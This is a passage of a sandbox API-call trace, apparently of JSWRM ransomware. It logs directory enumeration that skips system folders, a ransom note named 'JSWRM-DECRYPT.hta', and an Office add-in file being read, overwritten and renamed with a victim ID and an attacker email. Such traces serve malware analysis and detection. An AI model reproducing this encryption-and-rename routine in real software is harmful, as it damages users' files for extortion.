[0123.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0123.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.986] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408e5353, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x408e5353, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4090dedc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.987] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.987] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.987] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.987] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.987] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.987] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b0f72e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b0f72e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.987] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.988] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d04716, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d04716, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d04716, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.988] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0123.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0123.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0123.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.988] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc72b8a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc72b8a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6af8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.989] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0123.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0123.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0123.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0123.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0123.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.989] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13440553, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e9db, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.et.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2=".") returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="..") returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="...") returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="windows") returned -1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="recovery") returned -1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="perflogs") returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="documents and settings") returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="system volume information") returned -1 [0123.989] lstrcmpiW (lpString1="PowerViewRes.et.xap", lpString2="msocache") returned 1 [0123.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.et.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.et.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.et.xap", lpUsedDefaultChar=0x0) returned 19 [0123.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.et.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.et.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.et.xap", lpUsedDefaultChar=0x0) returned 19 [0123.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\PowerViewRes.et.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\powerviewres.et.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.991] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=322011) returned 1 [0123.991] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.992] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.005] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.005] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.006] CloseHandle (hObject=0x338) returned 1 [0124.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0124.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0124.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0124.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0124.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0124.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.006] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\PowerViewRes.et.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\powerviewres.et.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\et\\PowerViewRes.et.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\et\\powerviewres.et.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0124.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.008] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13440553, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e9db, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.et.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.008] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0124.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0124.009] HeapFree (in: hHeap=0x1e0000, 